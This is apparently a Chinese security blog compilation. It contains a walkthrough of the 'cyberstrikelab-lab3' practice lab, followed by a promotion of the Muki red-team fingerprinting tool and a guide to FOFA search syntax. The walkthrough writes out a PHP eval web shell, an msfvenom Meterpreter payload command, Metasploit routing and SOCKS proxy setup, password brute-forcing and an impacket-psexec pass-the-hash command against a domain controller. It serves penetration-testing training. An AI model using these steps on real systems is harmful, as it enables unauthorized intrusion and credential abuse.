【域渗透】cyberstrikelab-lab3 cyberstrikelab-lab3web信息收集端口扫描nmap -sT -Pn -p- 192.168.10.10 -T4 3590端口开启是一个web应用扫描出来了一个访问看看是一个登录框查看登录界面的网页源码登录进来看到版本信息使用万能的搜索引擎看到这里有一个本地文件泄露漏洞找到第一个flag另外还发现能在web目录写入文件，我们写入一句话<?php @eval($_POST['cmd']);?> 蚁剑连接msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe 内网渗透上线msf直接就是系统权限查找fscanfind / -name "fscan.exe" 2>/dev/null 利用meterpreter模块上传upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe 看到有双网卡fscan扫描另一张网卡，发现192.168.20.20和192.168.20.30靶机，其中30是域控主机使用fscan扫描第一台机器的端口添加路由run post/multi/manage/autoroute 配置代理use auxiliary/server/socks_proxy set VERSION 5 set SRVPORT 1080 run -j 修改代理vi /etc/proxychains4.conf 访问到thinkphp站从flag中可以看到木马在主页使用awBruter密码爆破工具，爆破出来密码是admin123蚁剑设置好代理使用密码连接找到第二个flag拿下系统权限域渗透之后就可以上传msf马，如果蚁剑不行的话（这个环境可能有一点问题，第二台机器老是断网）那就使用windows的远程连接上传到10.10，然后再利用windows自带的远程连接传20.20机器（前提是创建了一个远程连接用户），往期很多文章都写过，之后利用msf抓取hash或者使用猕猴桃抓取哈希，使用hash传递攻击proxychains impacket-psexec -hashes :f349636281150c001081894de72b4e2b cyberstrikelab.com/administrator@192.168.20.30

Muki 2.0：红队资产指纹识别利器，精准锁定攻击入口 Muki 是红队作战场景下的专属资产指纹识别利器，核心聚焦渗透测试的信息收集阶段 —— 面对 C 段资产、海量杂乱目标时，能帮助安全研究人员快速穿透信息迷雾，精准锁定具备攻击入口的易受攻击系统，为后续渗透测试提供明确靶标。其技术优势在于突破传统被动式扫描的局限，在被动指纹探测基础上，新增特殊路径定向扫描机制，可捕获常规被动扫描无法覆盖的隐藏资产特征；升级至 2.0 版本后，已整合 3W+ 精准指纹库，覆盖各类主流及小众系统、应用场景。目前工具提供 Linux、Mac、Windows 全平台版本，适配红队不同作战环境需求，是信息收集阶段高效、可靠的必备工具。开源地址https://github.com/yingfff123/MUKI快捷下载方式,linuxwget https://github.com/yingfff123/MUKI/releases/download/2.02/MUKI-2.02-linux-amd64.zipunzip MUKI-2.02-linux-amd64.zipcd MUKI-2.02-linux-amd64./muki参数列表  --config 配置文件（默认为 $HOME/.Muki.yaml）-f, --文件字符串 包含待扫描 URL 的文件--格式字符串 输出格式（控制台、JSON、CSV）（默认值为“控制台”）-h, --帮助           Muki 的帮助信息-l， --列表字符串 包含多个待扫描 URL 的文件（每行一个）-A， --无活动模式   禁用活动指纹扫描-N， --无目录模式 禁用目录扫描-x， --无被动模式   禁用被动指纹扫描-o， --输出字符串 输出文件路径-p， --代理字符串 指定代理服务器，例如 http://127.0.0.1：8080 或 socks5://127.0.0.1：1080-t， --线程整数   线程数量（默认值：CPU 核心数 × 3，最小 8，最大 100）（默认值 8）-u， --URL 字符串 待扫描的 URL使用方法./muki -u https://www.baidu.com风险评估、敏感信息、敏感路径被动指纹、路径扫描等模块重点资产信息 

信息收集：网络空间测绘FOFA，查询语法最全使用方法（图文解析） 前言经粉丝投稿，特意搜集了一些fofa的使用教程和一些高级用法什么是FOFA？官网描述：FOFA－网络空间资产搜索引擎是华顺信安推出的一款通过对全球网络对外开放服务的资产进行主动或被动方式探测、抓取、存储，分析整理不同种类的网络空间资产指纹信息（规则），并对符合规则的资产进行统计分析，进而快速检索全球网络空间资产的产品。它能够帮助用户迅速进行网络资产匹配，快速开展网络空间威胁态势感知、漏洞影响范围分析、应用分布统计、应用流行度排名统计等工作。查询语法表高级搜索逻辑连接符具体含义=匹配，=""时，可查询不存在字段或者值为空的情况。==完全匹配，==""时，可查询存在且值为空的情况。&&与||或!=不匹配，!=""时，可查询值不为空的情况。*=模糊匹配，使用或者?进行搜索，比如banner="mys??" (个人版及以上可用)。()确认查询优先级，括号内容优先级最高。基础类别标记类（Special Label）协议类 （type=service)网站类（type=subdomain）证书类地理位置（Location）时间类（Last update time）独立IP语法（独立IP系列语法，不可和上面其他语法共用）查询基础语法案例直接输入查询语句，将从标题，html内容，http头信息，url字段中搜索；html搜索我们找到某云的登录提示，因为文字在网页中皆属于html复制在fofa查询即可，发现还有其他的网站使用了关联的内容那么我们可以对国家进行筛选此时即可缩小查找的范围既然是html，那么我们这样搜索呢title标题搜索domain域名搜索如果查询表达式有多个与或关系，尽量在外面用()包含起来，比如这样。host主机名搜索host="主机名"os操作系统搜索os="操作系统"server服务器查询server="nginx"通过服务器进行查询org所属组织body搜索内容通过HTML正文进行查询js_name通过HTML正文中js进行查询headerheader="thinkphp"portport="3306"，找mysql的端口地址icpicp="备案号"status_codestatus_code="服务器状态码"protocolprotocol="协议类型" ，例如https/ssh/httpcountrycountry="国家编码"regionregion=“行政区” ，英文名称即可citycity=“城市”appapp="设备"基础常用语法就到这儿了，都看完了，那么再加个群和大佬们一起交流吧 =-=